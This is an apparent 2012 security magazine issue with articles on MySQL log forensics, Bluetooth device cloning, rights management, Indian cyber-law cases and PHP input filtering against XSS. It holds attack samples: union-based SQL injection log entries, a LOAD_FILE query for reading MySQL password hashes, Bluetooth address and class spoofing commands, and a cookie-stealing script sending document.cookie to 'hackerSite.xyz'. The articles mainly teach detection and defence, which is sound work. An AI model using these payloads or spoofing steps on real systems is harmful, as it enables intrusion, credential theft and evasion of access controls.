CHMAG-Nov2012

Issue34 – Nov2012 | Page-1




mysql>show processlist;

Logging in MySQL

Introduction This article demonstrates logging

techniques in MySQL to uncover and

analyze any mischief attempts done by

(outside or inside) user focusing on specific

areas in database.

What you will learn

In this article I am going to talk about how

logging is done in MySQL, and what all

places to look for information regarding

queries executed by all clients using MySQL

database.

Pre-requisites

The reader must have basic working

knowledge of MySQL and Operating System

to understand technical details in this

article.

Getting Started

Following are the types of logs available in

MySQL

Log Type Info Written to Log Error log Problems encountered

starting, running, or stopping mysqld

General query log

Established client connections and statements received from clients

Binary log Statements that change data (also used for replication)

Relay log Data changes received from a replication master server

Slow query log

Queries that took more than long_query_time seconds to execute

By Default, logging is not enabled in

MySQL. To enable that use command

―show processlist‖.

Note: This shows all running queries. Info

column in result shows the query which is

executed.

Figure 1: processlist Output


mysql> show variables;

log_output = „FILE|TABLE|BOTH‟

Now this is only showing data for current

session. If you want to see all the queries

being executed on the server then you

should log them first.

We have seen different types of logging in

MySQL, so which one to use? We will use

General Log, which will give us all the

queries executed at the server.

How to go about it?

Check logging is enabled or not

What type of logging is enabled

(FILE, TABLE, BOTH)?

If not enabled, how to enable it?

What to check?

Checking logging is enabled or not

Simply log into the MySQL prompt and

issue following command

This will list all the global variables in

MySQL. Look for general_log variable and

its value; Ideally if logging is not enabled

then its value would be ―OFF‖ and

general_log_file variable would be:

For *NIX: “/var/lib/mysql/mysql.log”

For Windows (XAMPP setup):

“C:\xampp\mysql\data\<system_name>.l

og”

What type of logging is enabled (FILE,

TABLE, BOTH)?

You can determine whether logging

is of what type by looking output of

following variable.

You can change the value of this

using following command

mysql> SET GLOBAL log_output =

„FILE‟;

Figure 2: All available variables in MySQL


mysql>SET GLOBAL general_log = „ON‟;

mysql> SET GLOBAL general_log_file =

„path_on_your_system‟;

mysql>SET GLOBAL slow_query_log = „ON‟;

mysql> SET GLOBAL slow_query_log_file =

„path_on_your_system‟;

If logging not enabled, how to enable it?

As logging is not enabled, let‘s enable that

first. To do that, issue the following

command.

Similarly you can set the logging for slow

query log.

Slow query logs are basically those which

took longer time to execute then specified

value in “long_query_time”

What to check?

So, we have all the required logs. What

Next?

Let‘s Analyze.

What could be wrong?

It could be attack from web, most

common being SQL Injection

What about somebody from inside?

Privilege escalation or data stealing?

In both the cases, who did it? Let‘s find

out….

Case 1:

Suppose, somebody got a weak link in the

application, and got into the system by some

SQL Injection. I don‘t have to explain what

is SQL Injection is, well I may can tell you

what someone can do with SQL Injection.

For the attacker, there can be only one entry

point, but in backend there are many things,

like web server, database server, etc.

Let‘s look at web server log (in our case its

apache logs). During normal operations ,

things would look pretty simple and straight

forward. At the glance it looks neat and

clean.

Let‘s search for something, like ―select‖, if

anyone is trying to run a SQL query

Similarly we can search for ―union‖ or any

other such SQL command to see if there is

any suspicious activity is going on.

Figure 3: Apache access log using Xpolog

Figure 4: Filtering log on "select" command


It is Interesting to see that we have some

requests which have SQL queries in the

request parameters. This indicates that

there is something suspicious about these

requests as timestamp is same for few

queries. It simply means attacker has run

an automated scanner to exploit the

vulnerability.

Suspicious log snippet: 127.0.0.1 - - [14/Sep/2012:15:45:10

+0530] "GET

/sqli.php?u=999999.9%27+union+all+selec

t+%28select+concat%280x7e%2C0x27%2C0x72

33646D3076335F68766A5F696E6A656374696F6

E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x3

1303235343830303536+and+%27x%27%3D%27x

HTTP/1.1" 200 54 "-" "Mozilla/4.0

(compatible; MSIE 7.0; Windows NT 5.1;

SV1; .NET CLR 2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:45:10

+0530] "GET


t+concat%280x7e%2C0x27%2Cunhex%28Hex%28

cast%28database%28%29+as+char%29%29%29%

2C0x27%2C0x7e%29%2C0x313032353438303035

36+and+%27x%27%3D%27x HTTP/1.1" 200 42

"-" "Mozilla/4.0 (compatible; MSIE 7.0;

Windows NT 5.1; SV1; .NET CLR

2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28user%28%29+as+char%29%29%29%2C0x

27%2C0x7e%29%2C0x31303235343830303536+a

nd+%27x%27%3D%27x HTTP/1.1" 200 47 "-"

"Mozilla/4.0 (compatible; MSIE 7.0;


2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28version%28%29+as+char%29%29%29%2

C0x27%2C0x7e%29%2C0x3130323534383030353

6+and+%27x%27%3D%27x HTTP/1.1" 200 39



2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28database%28%29+as+char%29%29%29%

2C0x27%2C0x7e%29%2C0x313032353438303035

36+and+%27x%27%3D%27x HTTP/1.1" 200 42



2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28system_user%28%29+as+char%29%29%

29%2C0x27%2C0x7e%29%2C0x313032353438303

03536+and+%27x%27%3D%27x HTTP/1.1" 200

47 "-" "Mozilla/4.0 (compatible; MSIE

7.0; Windows NT 5.1; SV1; .NET CLR

2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28%40%40hostname+as+char%29%29%29%

2C0x27%2C0x7e%29%2C0x313032353438303035

36+and+%27x%27%3D%27x HTTP/1.1" 200 42



2.0.50727)”

127.0.0.1 - - [14/Sep/2012:15:46:05

+0530] "GET



cast%28%40%40basedir+as+char%29%29%29%2

C0x27%2C0x7e%29%2C0x3130323534383030353

6+and+%27x%27%3D%27x HTTP/1.1" 200 47



2.0.50727)”

Figure 5: Filtering log on ''union" command


Once you are sure that there is an incident

of SQL Injection by an unknown IP then you

can proceed with the formal procedure of

investigating this issue with cyber cell.

Case 2:

Now let‘s consider the second case, where

MySQL user who has access to database has

done some mischiefs. Popular activities

possible are:

Running privileges escalation

attacks

Getting root password (will see how)

Dumping database(s) into files

Note: There are few privilege escalation

attacks available in Metasploit also.

For getting the root password is fairly

simple. A low privilege user just has to

execute following command on the prompt.

Note: The path will change as per the setup.

If you are not getting any result then you

should have physical access to this file, ssh,

RDP, etc. Basically we just need data of this

file.

This is a binary file containing the MySQL

user information with username and

password. So if you are root user then you

can simply run following query to see all

users.

When low privilege user (fdb in our case)

tries to run this query, obviously he will get

access denied error. At this instance our

previous query will be handy, reading

binary file. So, what is the problem now?

Simple, the password is stored in MD5

hash. Cracking this would not take much

time.

Note: Tools like md5crack, John the Ripper,

Cain & Adel do a fine job of cracking MD5

hashes.

Considering the last part, where user is

dumping the database into file for some

notorious purpose, we can check the same

in our general_log or slow_query_log for

such queries. In this case we are opening

this log file in and we will do some manual

analysis first.

Here is snippet of the query log:

325 Connect root@localhost on

325 Init DB forensics

325 Query SELECT * FROM

forensics_test where uname = '999999.9'

union all select (select distinct

concat(0x7e,0x27,unhex(Hex(cast(schema_

name as char))),0x27,0x7e) from

`information_schema`.schemata limit

3,1),0x31303235343830303536 and 'x'='x'

325 Quit









4,1),0x31303235343830303536 and 'x'='x'

mysql> SELECT

LOAD_FILE(„C:\xampp\mysql\data\my

sql\user.MYD‟);

mysql> select Host, User,

Password from mysql.user;

Figure 6: Users table in MySQL


326 Quit









5,1),0x31303235343830303536 and 'x'='x'

327 Quit









6,1),0x31303235343830303536 and 'x'='x'

328 Quit









7,1),0x31303235343830303536 and 'x'='x'

329 Quit









8,1),0x31303235343830303536 and 'x'='x'

330 Quit

What we basically search is statements like

―union select‖, query to

―information_schema‖ database, query to

―mysql‖ database, etc. Then analyze it

further to conclude on a result.

Conclusion

Only logging will not do the job, it is also

important to do analysis after that.

Frequently, database administrator(s) only

enable logging features, and leave just like

that. But the actual analysis behind it is

much more important. One thing that I

shouldn‘t be mentioning is that, using this

technique you can extract all the queries

used by an automated scanner like, Havij,

SQLMap, etc. I personally do not

recommend that, but once you know the

queries these tools run you will better

understand SQL Injection.

References:

http://dev.mysql.com/doc/refman/5.1/en/s

erver-logs.html

DhirajRanka [email protected]

DhirajRanka is currently working as

Senior Security Analyst at NII

Consulting, Mumbai for more than four

years. He is additionally involved in

intensive research and Web-based

applications testing, intended primarily

for executing vulnerability assessment

projects and delivering trainings.

http://dev.mysql.com/doc/refman/5.1/en/server-logs.html

http://dev.mysql.com/doc/refman/5.1/en/server-logs.html

mailto:[email protected]


Cloning Bluetooth Device

[Note: This demonstration is based on

article ―Bluetooth Reconnaissance –

Watching over Invisible‖. Please go through

it before moving forward]

Well in the previous section we saw that

how to find the devices which are in visible

as well as in invisible mode using different

tools. And also understood the different

terms we get while scanning process.

Here we will recall one scan information.

So here in first block the Bluetooth

addresses given then the clock offset and

then class information. By looking at class

information we can conclude which of

device we have scanned.

In this section let‘s play with our own

Bluetooth interfaces, so that we can prepare

them for attack.

Initial State:

The above screenshot is of my hci1 external

Bluetooth dongle‘s initial configuration.

Specially look at BD_ADDR, Name and

Class.

Basic and most important, first we will

change BD_ADDR of device.

#bdaddr -i hci1 <new_bd_addr>


As like hci1, we can change address of all of

Bluetooth devices as want –

In above screenshot, you can see that both

hci0 and hci1 device‘s BD_ADDR is

changed.

hci0 to AA:AA:AA:AA:AA:AA

hci1 to BB:BB:BB:BB:BB:BB

Now effectively rather than changing

address to all A‘s or all B‘s, we can clone our

device to any other Bluetooth devices.

First scan the air:-

#hcitool scan

Why not to pick up android BD_ADDR?

#bdaddr -i hci1 <BD_ADDR>

You can cross-check the configuration by-

#hciconfig–a

So now we successfully changed the

BD_ADDR. Interesting note is once

BD_ADDR is changed, it will remain

forever.

Now let‘s change our device name -

#hciconfig hci1 name “android”

You can cross-check again and verify that

name is also changed.


So now, does our Bluetooth device will act

as phone? The answer is no. You can

observe the class field. It is still 0x000000.

Let‘s change its services too…

#hciconfig hci1 class 0x58020c

Now you can clearly see that we changed the

BD_ADDR, name and also class of our

device as per our wish.

You can clearly see with these settings,

when scan is made through smartphone,bt-

0 which is default Bluetooth interface for

which we didn‘t make any changes. And

name android is nothing but hci1 dongle,

which we converted into android

smartphone.

The question is why to do these

changes?

Basically in certain premises if any

particular Bluetooth type device is blocked

or not allowed, we can simply move to any

other device with just few commands. The

above setting also plays very important role

in many attacks which we will look further.


Again the question is while doing

these configuration changes how to

find that on which class to move?

URL: http://bluetooth-

pentest.narod.ru/software/bluetooth_class

_of_device-service_generator.html

Find class of any device you wants to pick

up.

As per your need, you can pick up any type

of device with the services you want as

shown above.

References:

1. http://en.wikipedia.org/wiki/Bluetooth

2. http://www.bluetooth.com

3. http://linux.die.net/man/8/hciconfig

Swaroop D. YermalkaR

[email protected]

Swaroop is a final year engineering

student from M.I.T.CollegeOf

Engineering, Pune. He is enthusiastic

and hobbyist for Infosec.

http://bluetooth-pentest.narod.ru/software/bluetooth_class_of_device-service_generator.html





Information Rights Management (IRM)

Information Rights Management is the set

of techniques and methods which protect

the highly sensitive information of the

organization irrespective of the file location

whether it resides "in" or "outside" the

corporate boundaries. This happens as the

permissions embedded inside the file don't

allow unauthorized access, modification,

copying or printing. This is typically done

for protection of financial documents,

intellectual property such as patents, design

blueprints and executive communications.

IRM broadly speaking addresses the

fundamental problem associated with Data

Protection Leakage (DLP). DLP heavily

relies on protection of sensitive file within

the corporate network typically at its end

points. It protects the data based on its

location (directory, file server/ database) or

in data in transit, but doesn't give the

protection at a more granular level, i.e.

information contained in file itself. IRM

currently applies mainly to documents and

emails in typical corporate environment

setting.

While DLP is ―transmission control‖

technology, IRM is ―usage control‖

technology.

Why do we need IRM?

The rationale for using IRM is that the

privacy information associated with data

must travel along with it. The copying of

that data must not lose the associated rights

to that information. Rights to modify,

update, restrict or even destroy that

information must be retained by the

individual it pertains to, even when a 3rd

party holds that information.

In larger context, IRM helps organizations

in enforcing corporate policy governing the

secure flow of highly sensitive data in the

organization. File protections are defined

and enforced based on user's identity along

with corporate policy on a given class of

data. The best way to protect information is

to do it directly at the level of the

information – and not at the level of many

system(s) which might change, transport or

store the information.

What exactly can be achieved with

IRM?

Preventing restricted content from

unauthorized modification, copying,

printing or pasting

Disabling Print Screen feature in

Microsoft Windows for taking

snapshots of restricted content.


Restricting content exposure

wherever it is sent

Support file expiration so that

contents in documents are rendered

un-viewable (or viewable)

automatically after a set time.

Full auditing of both access to

documents as well as changes to the

rights/policy by business users.

What can't be prevented using

IRM?

Sensitive Content from being erased,

stolen, captured or transmitted by

malicious programs like Trojans, key

loggers etc.

Content from being lost or corrupted

due to virus infection

Restricted content from being hand-

copied or retyped from a display

screen.

Taking digital photograph of the

restricted content displayed on a

screen by unauthorized person

Snapshots of restricted content are

possible using 3rd party screen-

capture tools.

Are Digital Rights Management

(DRM) and IRM same things?

Not Really. Digital Rights management

(DRM) technologies are typically used by

hardware manufacturers, publishers,

copyright holders and individuals with the

intent to limit the use of digital content and

devices "after sale". It is specifically targeted

to defeat any attempts for rich media piracy

like Blu-ray, CD, DVD's, tapes, records. In

United States, a legal mandate called Digital

Millennium Copyright Act (DMCA) exists

which imposes criminal penalties on those

who make available technologies whose

primary agenda is to bypass content

protection technologies.

Main focus of DRM is to defeat copyright

infringement by putting "digital locks" to

rich media eg. records, CD, DVD's etc in

business to customer domain, while IRM

restricts itself to sensitive information

exchange in business to business domain

such as merger-acquisition plans, design

blueprints, patents, financial statements,

strategic business plans etc.

Key for IRM’s successful

implementation

The strength of IRM is typically reserved for

very sensitive information that travels

outside organization — to vendors,

suppliers, outsourced parties, partners etc.

But challenges for proper authentication are

quite complex outside the enterprise. Here,

three approaches must be used for effective

implantation of IRM enterprise based

solutions:

Automating policy assignment

More automated is policy assignment, better

is IRM implementation. This happens as

automation eliminates human errors

resident in manual processes which in turn

make it more effective. They can

automatically protect documents such as

price lists, product specifications, and

manufacturing process description. This

works effectively because if we let document

authors be the sole arbiter of what to

protect, it puts an unwelcome burden on


them. They may neglect to do it correctly,

consistently, or at all.

Organizations can automatically assign

policies to entire information groups such as

anything saved to a certain folder, content

of a certain type, or information that has

reached a particular stage in a workflow.

This saves time, ensures consistency, and is

the most efficient way to manage large

volumes of sensitive information with IRM.

Dynamic policy control

As business conditions evolve, IRM policies

that govern the use of content must evolve

as well. Regulatory changes will almost

always require modifications to information

policies such as patent expirations, litigation

settlements, mergers and acquisitions etc.

Dynamic policy control enables recipient

entitlements to be changed when individual

roles or business needs change, regardless

of where the content resides—even when its

location is unknown. Policies reside on a

policy server, not within the content. So

they can be changed or revoked at any time.

Rights can also be set to automatically

expire.

Discretionary policy application

In the enterprise, discretionary use of IRM

is an option that should be used in addition

to rather instead of automated policy

application.

Audit Trail

An audit trail is an unalterable,

chronological log of access to a system and a

record of additions, changes, and deletions

to information that system manages, which

lists the person accessing the system, and

the time of access, and the action taken.

Steps before Implementing IRM

So you are all rolled up to implement IRM

solution in your company. But before that,

answer this quick checklist:

Outline business areas where

sensitive information is frequently

exchanged?

What needs to be protected

(documents, email etc.)

How will security policies be

enforced to protect this sensitive

information or communication?

Who can use the information

(people, group)

What a user can do with that

information (read, write, print or

forward)

When can the user access the

information (time duration and

dates)

Where can the information be

accessed from (in office, home,)

What would be the consequences to

the business if this information

ended up in the wrong hands?

Does the organization retain any

employee, customer, or member

information that could be used in

identity theft if it were exposed,

either through loss or theft?

Popular IRM Vendor List

Seclore File Secure

Microsoft Integrated Rights

Management

Boole Server

Smart Cipher

EMC IRM Product Suite


Challenges in IRM implementation

Lack of commitment by senior

management

The biggest roadblock in IRM

successful implementation is the

inadequate commitment shown by

senior management. Management

has to be convinced and made aware

the value of information in the

business. Consequences of losing

sensitive information must be

highlighted such as unwanted loss in

brand image and reputation, losing

client and stakeholder confidence.

Unpleasant lawsuits may proceed if

the leakage of sensitive information

is made public.

Common mistake made by senior

managers during implementation is

that they delegate the entire part of

IRM implementation to the IT team

and not take much responsibility for

it. It is important to note that IRM

must be top driven from senior

management which only can bring

about a cultural change in the

organization. Without their support,

implementation at the best stays

patchy and disorganized.

User Unwillingness to change

IRM‘s restrictive nature and

perceived usage hassles may at first

not easily gel with users. Users must

be made to undergo a mandatory

training and awareness workshop to

help ease through this process.

Suggested methodology can be

summarized as:

Methodology for managers to inducing

change in users

Unfreezing: This step alters the

forces on individuals sufficiently

such that they are distracted to opt

for a change. It reduces the user

resistance due to increased peer

pressure to induce them to go for a

change.

Moving: This step presents direction

of the change and the actual practice

of learning new attitudes.

Refreezing: The final step forges the

changed attitudes and learned skills

in users.

A good practice will be to train some

of the people in the organization and

nurture them as champions in usage

of IRM. It will be better if at least

one person from every department is

included as a part of the IRM

implementation task force. This task

force will work in close cooperation

with vendors/security team during

implementation process.

After the official implementation is

over, these champions will provide

the first point of reference and

support for any issues arising in DLP

to new users. Hence, user

satisfaction increases and

consequently resistance to adopt

new technology is lowered down.

Miscellaneous Factors

External User Authentication for

partners, vendors, suppliers,

outsourced parties, must be strong

enough and well formed. Any loose

ends will damage the confidentiality

of the information.


Most IRM's like Microsoft‘s

Windows Rights Management

Services are great for Windows and

Office. But they are mainly for

Microsoft apps. For apps like in CAD

or blueprints, other solutions are

either from small vendors or very

limited in scope.

References:

1. http://www.iotap.com/Blog/tabid/6

73/entryid/61/Information-Rights-

Management-Sharepoint-2010.aspx

2. http://en.wikipedia.org/wiki/Infor

mation_Rights_Management

3. http://blogs.kuppingercole.com/kup

pinger/category/information-rights-

management/

4. http://covertix.blogspot.in/

5. http://www.rcpbuyersguide.com/dl

oad.php?file=whitepapers/SponsorI

ndex_EMC_Whitepaper11534369.p

df

6. http://www.niiconsulting.com/solut

ions/information_rights_manageme

nt.html

Manas Deep [email protected]

Manasdeep currently serves as a

Security Analyst in the Technical

Assessment team at NII Consulting,

Mumbai. His work focuses on

conducting Security Audits,

Vulnerability Assessment and

Penetration Testing for NII‘s premier

clients.

He possesses strong analytical skills and

likes to keep himself involved in learning

new attack vectors, tools and

technologies. He has flair in technical

writing and shares his thoughts on his

blog ―Experiencing Computing…‖

at http://manasdeeps.blogspot.in. He

has also published information security

paper(s) in International Journal of

Computer Science and Information

Security (IJCSIS) along with various

seminar / conference proceedings.

http://www.iotap.com/Blog/tabid/673/entryid/61/Information-Rights-Management-Sharepoint-2010.aspx



http://en.wikipedia.org/wiki/Information_Rights_Management

http://en.wikipedia.org/wiki/Information_Rights_Management

http://blogs.kuppingercole.com/kuppinger/category/information-rights-management/



http://covertix.blogspot.in/

http://www.rcpbuyersguide.com/dload.php?file=whitepapers/SponsorIndex_EMC_Whitepaper11534369.pdf




http://www.niiconsulting.com/solutions/information_rights_management.html




http://manasdeeps.blogspot.in/


Landmark Cases Decided by the Adjucation Office U/Chapt. IX of the IT Act

(I) Shri.Thomas Raju Vs. The

Branch Manager, ICICI Bank, Anna

Nagar Branch, Chennai

Case decided by – the Adjudicating officer,

Government of Tamilnadu.

Civil Jurisdiction.

Petition No. 3 of 2011

Dated– 16th May, 2011

Petitioner, an employee of a Chennai based

IT company, suffered a loss of Rs. 1,

62,800/- as a result of the phishing attack.

The said amount was supposed to have been

transferred on the account of another

customer of ICICI Bank.

Petitioner claimed that he had suffered a

wrongful loss due to unauthorised access to

his savings account at the Anna Nagar

branch of ICICI Bank.

Petitioner further claimed that he had

suffered a loss as bank has failed to

establish a due diligence and in providing

adequate checks and safeguards to prevent

unauthorised access into his account. Bank

had also not adhered to the KYC norms

given by the RBI.

The Adjudicating officer directed the ICICI

bank to pay damages to the Petitioner under

Section 43 of the IT Act.

Following cases are decided on the

same subject matter by the same

authority –

(Note: - Only citations are provided below,

full judgments can be downloaded from

http://www.tn.gov.in/departments/it.html)

I) S. UmashankarVs. ICICI Bank



Civil Jurisdiction

Petition No. 2462 of 2008

Dated – 12th April, 2010

http://www.tn.gov.in/departments/it.html


II) K.J. JeevakaArasuVs. ICICI Bank



Civil Jurisdiction

Petition No. 1/e-gov. I/2011

Dated – 6th April, 2011

SagarRahurkar

[email protected]

SagarRahurkar is Masters of Law, a

Certified Fraud Examiner (CFE) and

Certified Cyber Crime Investigator. He

specializes in Cyber Laws, Fraud

examination, and Intellectual Property

Law related issues. He has co-authored a

book titled ―Introduction to Cyber

Crimes and Cyber Law‖.

Currently he works with Mahindra

Special Services Group in Fraud Risk

Management.



Automatic Request Filter in PHP

Filtering plays a very important role when

you are thinking about securing your

application against malicious attacks.

Security is a very important aspect while

developing a web application. There are

several kinds of attacks that could be used to

break into your web application. Based on

the kind of attack the results that hacker

gets also varies. Suppose you have SQL

injection vulnerability in your application

using SQL injection vulnerability an

attacker can do lots of things, simplest being

getting information related to users

registered in your web application. And

when a hacker has information about your

user he can do a lot of things. However we

are not going to discuss it in detail. Filtering

does not allow you to fully secure your web

application but it does increase some level

of security in your web application. The

simplest attack that you can stop by doing

request filtering is XSS.I will be giving you a

step by step guide on how you can stop XSS

on your web application using different

techniques.

In this article we will try to solve some of the

questions related to filtering:-

What is Filtering?

Why is it required?

How can we do Request filtering in

PHP?

Why do we need to automate it?

How can we automate it in PHP?

This is most helpful to someone who

is seeking a quick reference to request

filtering in PHP.

What is Filtering?

Filtering in general terms can be described

as removing unwanted contents from input

,validating input data against some format

or converting your input data in some

format so that your application does not

behave in unwanted manner.

There are two main types of filtering one is

validation and other is sanitization.

Validation is to check if the data that

is being filtered meets certain

criteria. For example we can validate

whether an email id is valid as it

needs to follow a proper pattern.

Sanitization is to either remove or

encode special characters which may

not be desired in a certain string.

Example of sanitization may be that

we encode <script> into

%3Cscript%3E. Why do we need to

do this will be explained in the next

section.


Why is Filtering Required?

Let‘s understand the importance of filtering

by a scenario:-

Suppose you have a web application in

which you have a Feedback section. A user

need not be a member of website and he can

post the feedback. Only the admin can view

the feedbacks. Now if proper validation has

not been done and user is able to post

malicious JavaScript also then there can be

a problem. How it can be a problem lets

understand it.

Suppose your application has some url like:

www.mysite.com/feedback.php

A hacker has created an application which is

used to store the cookies he has stolen. Now

if proper validation is not done and if your

application is vulnerable to XSS he can steal

your credentials by some JavaScript similar

to this.

<script

language=”javascript”>document.l

ocaltion=”http://hackerSite.xyz/

stealcookie.php?cookie=”+documen

t.cookie</script>

If your admin clicks on this he would be

redirected to hackers application where

credentials may be stored using the cookies.

Now what can he do with admin credentials

depends on your application but surely he is

able to break into your web application

which in any case should not happen.

Consider a comment page is there which can

be viewed by everyone and person post

similar link and users happen to click on it

which will lead to their accounts being

compromised. Now if user accounts are

compromised it will lead to a serious

problem. You might be storing some

sensitive information about user which if

goes into wrong hands may create some

serious trouble for user and You.

In the next section we will be looking

forward to figure out that how can we

implement filtering in PHP.

How can we do Request filtering in

PHP?

To do request filtering you should be able to

first catch the request and then filter the

data in each request attribute. I will be

explaining how to capture all the requests in

PHP and will be explaining two ways of

filtering the Request attributes.

Let us first understand how we can capture

all the request attributes.

PHP has three key –value based arrays for

handling request $_GET, $_POST and

$_REQUEST.

$_GET is used to capture all the attributes

sent by GET method.

$_POST is used to capture all the attributes

sent by POST method.

$_REQUEST is combination of $_GET and

$_POST. However I would suggest you not

to totally depend on $_REQUEST as you

might not be able to get all attributes in

$_REQUEST due to some server

configurations.

Now to handle all this there is small piece of

code.

I have written a code for handling all GET

attributes in a request similar approach

should be used for $_POST and

$_REQUEST.


if (! empty ($_GET))

{

foreach ($_GET as $key =>

$value) {

//Filtering code to be put here

}

}

Just change the name to $_POST and

$_REQUEST in foreach to implement it for

other two.

Now we will look forward to how can we do

the filtering with two approaches

1) Using htmlentities- htmlentities is a

build in function in PHP it encoded HTML

to htmlentities so < is converted to ―<‖

Now when you do this the browser will

represent it as < but it will prevent browser

from using it as HTML and so JavaScript

will not be executed.

Here is the code for implementing

htmlentities-

$_GET [$key] = htmlentities

($value)

Just put this code inside foreach loop.

2) Using Filters in PHP-Filters is a very

useful extension in PHP and you should use

it in order to provide better security to your

code. There are mainly two types of filters in

PHP.

Validate Filters-This set of filters

is used to validate or check if data

meets certain pattern or

qualification. An example can be to

validate whether user has entered a

valid email. So an email has some

pattern like [email protected] or in

etc. You can think it to validate it by

writing your own algorithm or use

filter functions in PHP. Like for

email you have

FILTER_VALIDATE_EMAIL

function. For more info on Filters

please follow

http://php.net/manual/en/book.filt

er.php.

Sanitize Filters-Sanitization filters

sanitize data by either encoding data

or removing special characters.

There are many Sanitization filters

and you can use them as per your

requirement.

For filtering data for stopping XSS we will

be using FILTER_SANITIZE_ENCODED.

Just try out this function and you will see

the results and differences. This will help

you in blocking XSS attack.

Now here is the code for implementing this

filter. $_GET [$key] =filter_var

($value,

FILTER_SANITIZE_ENCODED);

Just put this code inside foreach loop.

Why do we need to automate it?

Now you might be thinking that we can

write these code in a single file and include

it in each script using <?phprequire_once

?> type of functions. This approach seems

good but consider a case when you have

already worked on your web application and

web application might be containing scripts

raging from few hundreds, to as large as

thousands. In this case adding the script on

every page will be a tedious job and you may

miss some pages. So what can we do? The

answer is to automate the prepending of

script. So how can we do the automation of

prepending of script will be explained in

next section.


How can we automate it in PHP?

I will be explaining the two approaches for

automating this in PHP. The following two

approaches can be used for many things

apart from filtering.

1) Using php.ini – As a developer of PHP

you should know about php.ini file. php.ini

file is a configuration file which is used by

Apache Server to load configuration settings

for your PHP. Common examples that you

might hear will be setting maximum upload

limit, maximum time to execute a script,

register global variables etc. But we are

more interested in knowing how can we

force a script to prepend on every script that

web-application has without touching the

code. So to do this you need to open your

php.ini file in a text editor and search for

auto_prepend_file. Here is a screenshot:-

You can append as well prepend a script.

Here we need to prepend the script.

Put absolute path of your filter script

inside the quotes that you would have

created using the methods explained

above.

Now in order to apply these settings

you need to restart your server

because apache server looks into

php.ini file whenever it starts for

loading PHP configuration.

Now question is where we should do

configuration like this. Now your server

might be having many web applications so

whenever you want that your script should

be implemented on all scripts on all web

applications hosted on server you should go

for php.ini settings however when you want

settings to be applied for particular web

application below is the approach.

2) Using .htaccess- .htaccess is a

configuration file used by Apache web

servers to configure web applications on

directory bases. Search for .htaccess file

inside your web application if it is not

available create one .htaccess file. Whenever

a document is called ‗.htaccess‘ file also

needs to be loaded. Thus it may affect your

performance.

To implement add following code to

.htaccess file.

php_valueauto_prepend_file ""

Put absolute or relative path of your filter

file inside double quotes.

In this case you don‘t need to restart your

server.

‗.htaccess‘ file can be used for doing a lot of

things.

So this is how you can automate request

filtering in PHP. We have created a simple

filter for stopping XSS however you can

create your custom filter using the same

approach as per your requirement.

ParasVij [email protected]



Documents

CHMAG-Nov2012